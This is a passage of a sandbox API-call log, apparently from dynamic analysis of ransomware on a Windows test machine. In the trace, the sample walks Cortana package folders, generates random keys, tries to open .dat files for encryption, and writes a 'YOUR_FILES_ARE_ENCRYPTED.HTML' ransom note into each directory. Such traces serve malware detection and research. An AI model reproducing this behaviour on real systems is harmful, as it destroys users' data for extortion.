nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0119.351] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.351] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned 169 [0119.351] GetProcessHeap () returned 0x600000 [0119.351] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.351] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\ActivationStore" [0119.352] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*" [0119.352] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x607a6a92, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x607ccd2e, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x607ccd2e, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318d3f0, dwReserved1=0xfda97ba3, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0119.352] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x607a6a92, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x607ccd2e, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x607ccd2e, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318d3f0, dwReserved1=0xfda97ba3, cFileName="..", cAlternateFileName="")) returned 1 [0119.352] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x607a6a92, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x1a160dbc, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x6092423b, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x318d3f0, dwReserved1=0xfda97ba3, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0119.352] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.352] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned 189 [0119.352] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0119.352] lstrlenW (lpString=".dat") returned 4 [0119.352] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0119.352] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\microsoft.windows.cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0119.352] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x607ccd2e, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x607ccd2e, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x607ccd2e, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318d3f0, dwReserved1=0xfda97ba3, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0119.352] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.352] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG1") returned 194 [0119.352] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0119.352] lstrlenW (lpString=".LOG1") returned 5 [0119.352] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0119.352] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x607ccd2e, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x607ccd2e, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x607ccd2e, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318d3f0, dwReserved1=0xfda97ba3, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0119.352] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.352] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG2") returned 194 [0119.352] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0119.352] lstrlenW (lpString=".LOG2") returned 5 [0119.353] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0119.353] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x607ccd2e, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x607ccd2e, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x607ccd2e, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318d3f0, dwReserved1=0xfda97ba3, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0119.353] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0119.353] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 199 [0119.353] GetProcessHeap () returned 0x600000 [0119.353] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\microsoft.windows.cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.353] WriteFile (in: hFile=0x320, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.354] CloseHandle (hObject=0x320) returned 1 [0119.355] GetProcessHeap () returned 0x600000 [0119.355] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.355] GetProcessHeap () returned 0x600000 [0119.355] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.355] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x607a6a92, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x607ccd2e, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x607ccd2e, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0119.355] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.355] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 183 [0119.355] GetProcessHeap () returned 0x600000 [0119.355] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\microsoft.windows.cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0119.357] WriteFile (in: hFile=0x214, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.358] CloseHandle (hObject=0x214) returned 1 [0119.358] GetProcessHeap () returned 0x600000 [0119.358] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.358] GetProcessHeap () returned 0x600000 [0119.358] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.360] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6056a7b2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6056a7b2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6056a7b2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0119.360] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.360] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState") returned 101 [0119.360] GetProcessHeap () returned 0x600000 [0119.360] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.361] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState" [0119.361] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState\\*" [0119.361] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6056a7b2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6056a7b2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6056a7b2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.361] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6056a7b2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6056a7b2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6056a7b2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="..", cAlternateFileName="")) returned 1 [0119.361] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6056a7b2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6056a7b2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6056a7b2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="..", cAlternateFileName="")) returned 0 [0119.361] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.361] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0119.361] GetProcessHeap () returned 0x600000 [0119.361] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0119.362] WriteFile (in: hFile=0x214, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.363] CloseHandle (hObject=0x214) returned 1 [0119.363] GetProcessHeap () returned 0x600000 [0119.363] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.363] GetProcessHeap () returned 0x600000 [0119.363] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.363] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x605908ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x605b6c25, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6d738e58, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0119.363] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.363] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings") returned 97 [0119.363] GetProcessHeap () returned 0x600000 [0119.363] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.363] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings" [0119.364] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\*" [0119.364] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x605908ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x605b6c25, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6d738e58, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.364] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x605908ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x605b6c25, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6d738e58, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="..", cAlternateFileName="")) returned 1 [0119.364] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x605b6c25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x605b6c25, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x605b6c25, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0119.364] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.364] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\roaming.lock") returned 110 [0119.364] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0119.364] lstrlenW (lpString=".lock") returned 5 [0119.364] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0119.364] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x605b6c25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x919c1634, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x919c1634, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0119.364] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.364] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\settings.dat") returned 110 [0119.364] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0119.364] lstrlenW (lpString=".dat") returned 4 [0119.364] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0119.364] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0119.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0119.364] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6d738e58, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6d738e58, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6d738e58, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x11800, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0119.364] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.364] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 115 [0119.364] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0119.364] lstrlenW (lpString=".LOG1") returned 5 [0119.364] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0119.364] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6d738e58, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6d738e58, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6d738e58, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0119.364] StrStrIW (lpFirst="settings.dat.LOG2", 